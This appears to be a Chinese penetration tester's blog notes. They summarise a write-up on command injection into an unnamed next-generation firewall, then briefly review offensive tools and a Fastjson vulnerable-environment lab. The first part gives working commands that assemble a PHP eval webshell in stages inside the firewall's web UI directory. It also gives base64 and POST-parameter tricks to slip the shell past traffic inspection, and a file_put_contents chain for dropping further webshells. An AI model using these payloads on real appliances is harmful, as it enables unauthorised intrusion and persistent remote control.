Quan

来自华顺信安的一篇文章，绕过某下一代防火墙做的操作，其中提到的限制如下：
1. 无法注入分号截断命令
2. 无法使用 `|| &&` 等特殊符号
3. 想要通过  echo 写入文件时，`>>` 追加写入的方式，不可以，`> `会被截断
4. 较长的 PHP 代码部分，都无法被传入，无法正常解析，需要分段截取写入
5. 传入命令时，需要对特殊字符进行 url 编码
那么如何绕过>>追加写入方式被截断这件事呢，给出了这样的payload
echo -e -n \"<?php \" > /fwlib/sys/virus/webui/svpn_html/1.txt

echo -e -n \"eval\" > /fwlib/sys/virus/webui/svpn_html/2.txt

echo -e -n '($_POST[\"pass' > /fwlib/sys/virus/webui/svpn_html/3.txt

echo -e -n '\"])' > /fwlib/sys/virus/webui/svpn_html/4.txt

echo -e -n \" ?>\" > /fwlib/sys/virus/webui/svpn_html/5.txt

cat /fwlib/sys/virus/webui/svpn_html/1.txt /fwlib/sys/virus/webui/svpn_html/2.txt /fwlib/sys/virus/webui/svpn_html/3.txt /fwlib/sys/virus/webui/svpn_html/4.txt /fwlib/sys/virus/webui/svpn_html/5.txt> /fwlib/sys/virus/webui/svpn_html/xxx.php
确实厉害啊...这个我没能想到
其次对于这个初始化的Webshell在流量侧并不能通过，于是给出了几个解决方案
echo system($_POST[1]("cHdk"));&1=base64_decode
还提到，如果有+号，需要URL编码一下，如果以=或者==结尾，那么就要在等于符号后面再加一个空格，不会存在解析问题，而且还能绕过，很好的Tips
Webshell连接
pass= $_POST[1]($_POST[2],$_POST[3]($_POST[4]));&1=file_put_contents&2=webshell名称.php&3=base64_decode&4=<webshell内容>
这里有个细节：在pass=后面是有一个空格存在的，原因原文有说

这个还在更新，并且内置模板，还没有仔细研究goblin
这个是两年前的项目，没有更新了Pricking 

学哥斯拉的一些东西的时候经常会找一个不错的反编译源码，这个很不错

直接说这个工具解决了我的几个痛点，非常好用
1.信息收集之官网集群
官网里有的时候会有个下级单位要收集，里面有很多的连接，但是我需要再写一个正则来匹配他们才行，这个工具解决了这个问题
2.信息收集之备案
有的时候需要通过备案来查询域名，一般流程是：复制->sublime->GPT写正则->提取。这个工具解决了这个问题
3.产生C段
这个太爽了，某些软件不支持cidr类型的，需要我自己生成然后读文件他去扫描，这个工具解决这个问题(还有一些其他环境)
Github

一直以来，对FastJson这个组件库的学习就没停过，但是很多时候搭建环境还是非常麻烦的，尤其是到了后面，需要配合其他依赖才行。今天在网上找到了这个项目，涵盖了很多Fastjson的漏洞环境。最开心的是，关于他的描述
FastJson全版本Docker漏洞环境(涵盖1.2.47/1.2.68/1.2.80等版本)，主要包括JNDI注入、waf绕过、文件读写、原生反序列化、利用链探测绕过、不出网利用等。设定场景为黑盒利用，从黑盒的角度覆盖FastJson深入利用全过程，部分环境需要给到jar包反编译分析。
Docker环境，开箱即用。
以及：每个机器根目录下都藏有flag文件，去尝试获取吧！
感觉很不错，最近正好还要复现一些Fastjson，体验一下。